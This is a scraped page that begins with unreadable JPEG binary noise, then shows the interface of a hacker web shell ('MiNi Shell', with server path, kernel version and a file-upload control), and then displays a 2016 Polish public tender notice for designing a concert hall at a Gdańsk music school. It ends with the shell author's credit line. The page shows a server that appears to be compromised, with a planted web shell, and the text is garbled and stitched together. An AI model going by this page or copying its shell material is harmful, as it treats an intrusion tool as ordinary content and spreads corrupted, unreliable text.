JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160601/63341-N-2016.html

<p class="kh_header"><b>Gdańsk: Wykonanie na rzecz Zespołu Szkół Muzycznych w Gdańsku-Wrzeszczu dokumentacji projektowo-kosztorysowej budowlano-wykonawczej, uzyskanie ostatecznego pozwolenia na budowę oraz pełnienie nadzoru autorskiego w trakcie inwestycji polegającej na realizacji II etapu budowy SM II st. im. F. Chopina w postaci sali koncertowej.</b><br>
<b>Numer ogłoszenia: 63341 - 2016; data zamieszczenia: 01.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Muzycznych w Gdańsku-Wrzeszczu , ul. Dmowskiego 16b, 80-264 Gdańsk, woj. pomorskie, tel. 058 3419213, 3460420, faks 058 3419213, 3460420.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsm-gdansk.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie na rzecz Zespołu Szkół Muzycznych w Gdańsku-Wrzeszczu dokumentacji projektowo-kosztorysowej budowlano-wykonawczej, uzyskanie ostatecznego pozwolenia na budowę oraz pełnienie nadzoru autorskiego w trakcie inwestycji polegającej na realizacji II etapu budowy SM II st. im. F. Chopina w postaci sali koncertowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie na rzecz Zespołu Szkół Muzycznych w Gdańsku-Wrzeszczu dokumentacji projektowo-kosztorysowej i budowlano-wykonawczej sali koncertowej wraz 
z projektem zagospodarowania terenu  oraz uzyskanie pozwolenia na budowę i pełnienie nadzoru autorskiego w trakcie inwestycji.
Projektowana inwestycja to II etap budowy Szkoły Muzycznej II st. im. F. Chopina w Gdańsku-Wrzeszczu przy ul. Partyzantów 21 A, (dz.nr 322/4, obręb 41) dla której została wydana Decyzja o ustaleniu lokalizacji inwestycji celu publicznego WUAiOZ-I-6733. 66-8.2012.2-HR.157920 
Projektowana sala koncertowa to budynek wolnostojący z łącznikiem do istniejącego budynku głównego szkoły (na zasadach określonych w pkt.3 decyzji), maksymalna pow. zabudowy 500 m2, wysokość max 11,0 m (pkt.1 decyzji). Nowo projektowana kubatura powinna tworzyć z istniejącymi budynkami szkolnymi harmonijną całość co do bryły oraz użytych materiałów wykończeniowych.
Sala koncertowa ma być samowystarczalna w zakresie obsługi publiczności (szatnia, sanitariaty, hall), natomiast dla wykonawców (głównie: szkolna orkiestra, chór, zespoły kameralne) opcjonalnie mogą być wykorzystane pomieszczenia w istniejącym budynku, ze szczególnym uwzględnieniem funkcjonalności  wspominanego łącznika. Estrada sali koncertowej powinna posiadać zaplecze w postaci pomieszczenia lub kilku mniejszych pomieszczeń, z których wykonawcy wchodzą na estradę. Zarówno zaplecze estrady jak i inne pomieszczenia w projektowanym budynku powinny posiadać funkcję użytkową ćwiczeniówek lub sal do zajęć indywidualnych. W projektowanym budynku można opcjonalnie uwzględnić piętro dydaktyczne.
W części podziemnej powinny znaleźć się pomieszczenia dla infrastruktury technicznej oraz parking. Hałas generowany przez urządzenia techniczne (system wentylacji, zasilania elektrycznego, oświetlenia i inne) oraz hałas środowiskowy pochodzący z zewnątrz jak i z innych pomieszczeń budynku powinien spełniać normy przewidziane dla sal koncertowych, przeznaczonych do odbioru klasycznej muzyki symfonicznej.
Właściwa sala koncertowa, część naziemna, powinna składać się z estrady o powierzchni 
min. 100m2 i widowni na min. 220 osób oraz pomieszczeń służących obsłudze publiczności. Projekt musi uwzględniać specjalne wymogi akustyczne, poparte analizą kierunku biegu fal i pomiarem czasu pogłosu oraz odpowiednią dla sali koncertowej przeznaczonej do  odbioru klasycznej muzyki symfonicznej kubaturę.  Przy programie użytkowym sali koncertowej zalecany wskaźnik kubatury na osobę wynosi od 8m3 do 10m3. Orientacyjnie, zalecana kubatura sali koncertowej w świetle materiałów wykończeniowych dla widowni 220 widzów i ok. 50-osobowej orkiestry wynosi od 2160m3 do 2700m3. 
Całkowity koszt robót budowlanych wraz z wyposażeniem sali koncertowej nie może przekroczyć 
10 mln złotych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 (trzech) prac projektowych o zakresie podobnym do przedmiotu zamówienia tj.  budowa lub przebudowa budynku o powierzchni zabudowy nie mniejszej niż 500 m2 (w przypadku przebudowy budynku, przebudowa musi obejmować prace projektowe branży budowlanej, konstrukcyjnej, sanitarnej, elektrycznej). W wykazywanym doświadczeniu przynajmniej 1 (jedna) praca projektowa (składająca się z projektu architektoniczno-budowlanego, projektu wykonawczego, specyfikacji technicznych wykonania i odbioru robót, przedmiarów, na którą wydano decyzję o pozwoleniu na budowę), musi dotyczyć budowy lub przebudowy Sali Koncertowej o parametrach co najmniej takich jak w opisie przedmiotu zamówienia, przeznaczonej do odbioru klasycznej muzyki symfonicznej z uwzględnieniem norm akustycznych dla tego typu obiektów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie projektantami sprawującymi samodzielne funkcje techniczne 
w budownictwie, tj. co najmniej 1 projektantem branży architektonicznej, co najmniej 1 projektantem branży konstrukcyjnej, co najmniej 1 projektantem branży sanitarnej,
co najmniej 1  projektantem branży elektrycznej,posiadającymi odpowiednie uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie oraz zaświadczenie o przynależności do odpowiednio Polskiej Izby Architektów, Polskiej Izby Inżynierów Budownictwa, co najmniej 1 specjalistą akustykiem, posiadającym co najmniej 3-letnie doświadczenie w projektowaniu Sal Koncertowych przeznaczonych do odbioru klasycznej muzyki symfonicznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji jakości - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku 
do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
1.	Zmiana terminu realizacji przedmiotu umowy:
1)	zmiany spowodowane warunkami atmosferycznymi i hydrologiczno-meteorologicznymi, w szczególności klęski żywiołowe; 
2)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, 
w szczególności: 
a)	wstrzymanie realizacji umowy przez Zamawiającego,
b)	konieczność wprowadzenia zmian w dokumentacji projektowej na wniosek Zamawiającego, 
3)	zmiany będące następstwem działania organów administracji, w szczególności: 
a)	konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego konieczności nie przewidywano przy zawieraniu umowy,
b)	konieczność zaspokojenia roszczeń lub oczekiwań osób trzecich - w tym grup społecznych lub zawodowych nie artykułowanych lub niemożliwych 
do jednoznacznego określenia w chwili zawierania umowy,
c)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, itp., 
d)	odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień lub nakaz uzyskania decyzji innego organu, niemożliwych 
do jednoznacznego określenia w chwili zawierania umowy,
e)	odmowa właściwego organu wydania zgody na ewentualna wycinkę drzewostanu znajdującego się na terenie działki projektowanej inwestycji.
4)	inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia działań w celu wykonania umowy, w tym uwarunkowania środowiskowe uniemożliwiające kontynuowanie prac. 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1) - 5) termin wykonania umowy może ulec przedłużeniu odpowiednio o czas niezbędny 
do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż 
o okres trwania tych okoliczności. 
2.	Zmiany osobowe: 
a)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy 
na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane, lub innych ustawach,
b)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, 
a od których wymagano określonego doświadczenia lub wykształcenia na inne legitymujące się doświadczeniem lub wykształceniem spełniającym wymóg SIWZ,
c)	zmiana, o której mowa w lit. b) będzie niemożliwa, w przypadku gdy dotyczy osoby ocenianej na podstawie podmiotowych kryteriów oceny ofert, chyba 
że w zamian za taką osobę zostanie zaproponowana osoba o doświadczeniu lub wykształceniu co najmniej takim samym jakie posiada osoba zamieniana. Zamawiający nie dopuszcza do zmiany personelu na osoby o niższych kwalifikacjach lub doświadczeniu, niż wskazano w warunkach udziału 
w przedmiotowym postępowaniu, 
d)	zmiany osób wskazanych do realizacji zamówienia.
3.	Zmiany organizacji spełniania świadczenia: 
a)	zmiana treści dokumentów przedstawianych wzajemnie przez strony w trakcie realizacji umowy lub sposobu informowania o realizacji umowy. Zmiana ta nie może spowodować braku informacji niezbędnych Zamawiającemu do prawidłowej realizacji umowy,
b)	zmniejszenie zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie stało się niemożliwe z przyczyn niezależnych i niemożliwych 
do przewidzenia przez Zamawiającego. Wynagrodzenie w takiej sytuacji zostanie zmniejszone w sposób proporcjonalny do okresu niewykonania usługi,
c)	Zamawiający dopuszcza możliwość wystąpienia, w trakcie realizacji przedmiotu umowy, zamówień dodatkowych rozumianych jako usługi, które są objęte przedmiotem zamówienia, ale nie były przewidziane w Opisie przedmiotu zamówienia,
d)	Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności wykonania prac zamiennych w stosunku do przewidzianych Opisem przedmiotu zamówienia w sytuacji gdy wykonanie tych prac będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej 
i obowiązującymi na dzień odbioru dokumentacji przepisami wykonania przedmiotu umowy,
e)	przewiduje się także możliwość rezygnacji z wykonywania pewnych prac przewidzianych w Opisie przedmiotu zamówienia w sytuacji, gdy ich wykonanie będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej 
i obowiązującymi na dzień odbioru prac przepisami wykonania przedmiotu umowy,
f)	w przypadku rezygnacji z wykonywania pewnych prac przewidzianych 
w umowie (prac zaniechanych), sposób obliczenia wartości tych prac, która zostanie potrącona Wykonawcy, będzie następujący: 
a.	W przypadku odstąpienia od całego elementu prac projektowych określonych 
w zestawieniu elementów zadania nastąpi odliczenie wartości tego elementu, określonej w tym zestawieniu, od ogólnej wartości przedmiotu umowy.
b.	W przypadku odstąpienia od części prac z danego elementu określonego 
w zestawieniu elementów zadania obliczenie niewykonanej części tego elementu nastąpi na podstawie jednostkowych wycen prac projektowych przygotowanych przez Wykonawcę, a zatwierdzonych przez inspektora Zamawiającego. 
4.	Płatności: 
a)	zmiany terminów oraz sposobu płatności wynikających z wszelkich zmian wprowadzanych do umowy, a także zmiany samoistne, o ile nie spowodują konieczności zapłaty odsetek lub wynagrodzenia w większej kwocie Wykonawcy,
b)	miarkowanie wysokości kar umownych w okolicznościach wskazywanych 
w odpowiednich przepisach kodeksu cywilnego. 
5.	Pozostałe zmiany: 
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ,
b)	zmiana obowiązującej stawki VAT; Wysokość wynagrodzenia za wykonanie zadania może ulec zmianie w przypadku zmiany stawki podatku VAT, o kwotę odpowiadającą różnicy w przypadającym do naliczenia podatku VAT,
c)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku wynikającymi 
z umowy planowanymi świadczeniami,
d)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. W takim przypadku zmiany w umowie zostaną ograniczone 
do zmian koniecznych powodujących uniknięcie kolizji.
e)	zmiany uzasadnione okolicznościami o których mowa wart. 357.1 Kc,
f)	wydłużenie okresu gwarancji lub rękojmi o dowolny okres. 

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsm-gdansk.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Muzycznych w Gdańsku-Wrzeszczu
ul. Romana Dmowskiego 16b
80-264 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2016 godzina 09:00, miejsce: Zespół Szkół Muzycznych w Gdańsku-Wrzeszczu
ul. Romana Dmowskiego 16b
80-264 Gdańsk
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com